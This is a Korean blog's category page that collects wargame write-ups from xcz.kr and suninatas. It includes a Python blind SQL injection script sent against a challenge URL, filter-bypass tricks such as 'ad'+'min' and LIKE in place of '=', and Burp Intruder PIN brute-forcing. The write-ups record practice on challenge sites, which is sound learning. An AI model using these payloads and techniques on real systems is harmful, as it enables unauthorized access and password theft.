일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
- 소프트웨어 개발보안 경진대회
- 3단계 지역 DB
- SessionAttribute
- DBMS
- react
- 인턴 후기
- Layered Architecture
- 메모리 포랜식
- reversing.kr
- ㅁㅇㅂ??ㅇㅈㄷ ㅎㅇㅌ...
- JSTL
- webhacking 처음
- 인턴 지원
- mysql
- spring
- 행정지역 DB
- frontend
- EER
- riceteacatpanda
- restapi
- Django
- 네이버 인턴
- 방명록 만들기
- 동읍면 DB
- jsp
- 정보보호병 후기
- Forensic 절차
- 소개딩
- Database
- PyAmdecoder
- Today
- Total
목록WEB_HACKING (112)
웹찢남
뭘 해야할지 몰라서 일단 새로운 문제 풀이 사이트를 찾아봤다! xcz.kr의 첫번째 웹 문제다. 위는 해당 페이지의 소스인데 1. 쿠키(c) get(g) post(p)의 인자값이 들어있어야 wrong이 안뜬다. 2. test function에서 값을 비교하는데 쿠키와 get / post 두개에 해당 값을 넣어야한다 3. get,cookie에는 givemepassword post에는 keyplz!가 들어있어야한다. 이렇게 payload를 보내면되는데 cookie는 f12로 추가하면되고 post에는 아래와같이 form을 만들어 입력해주면 CLEAR!!!
글자수 제한이 있어서 화가 났다.... right함수를 쓰면 끝까지 풀 수 있을 것 같은데 머리가 띵 해져서ㅎ... admin이 필터링 되있어서 ad'+'min'으로 bypass가 가능하다. 근데 전과다르게 substring 필터링 돼 있어서 방법을 생각해보니 left와 right가 있었다. 근데 하다보니 또뭔 글자수 제한도 있었다... 두번 코드짜기가 너무 싫어서 한번에 할 방법을 생각하다 부등호를 사용하기로했다. 아래는 코드! import re import requests import time flag = '' length= 0 str1='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' for i in range (1,20): for ..
대놓고 blind sql injection 문제다.. 여러 값을 넣어보면 pw를 나중에 한번 더 확인 하는 걸 알 수있다. import re import requests import time flag = '' length= 0 for i in range (1,20): for j in range(33,122): r=requests.post("http://www.suninatas.com/challenge/web22/web22.asp?id=admin' and substring(pw,"+str(i)+",1)='"+chr(j)+"'-- &pw=123") if 'OK admin' in r.text: flag=flag+chr(j) print("finding pw: "+flag) break print("pw "+fla..
소스 코드를 확인해보면 아래와 같이 브루트 포싱을 하라고 대놓고 나와있다... case가 10000개나... 버프수트의 intruder을 사용해 payload를 보냈고 pw는 7707이었다 Clear!!!
카페에서 문제풀다가 조금 당황 했다 ㅎ... 어쨋든 소스코드를 보면 아래와 같은 것들이 있다. hint와 아래에 로 숨겨져있던 submit 버튼이다. console에 frm.submit()을 쳐놓고 새로고침을 하면서 파박! 하면 CLEAR!!!
해당 문제로 들어가면 다음과 같은 board가 나오는데 세번째 article이 메인이다. password input을 bypass하면 되는데 특정 문자를 입력하면 No hack 이라고 뜬다. 확인해본결과 = 이 필터링 돼 like를 사용하기로 했다. 들어가면 어떤 글이 나온다. 저 auth key가 flag인줄 알았는데 아니었다... 저건 뭔지 모르겠지만 안에 들어가 소스 코드 보기를 눌러보나 아래와 같은 글이 있었다 구글링 하니 아우구스투스 라는 답이 나왔따. CLEAR!!!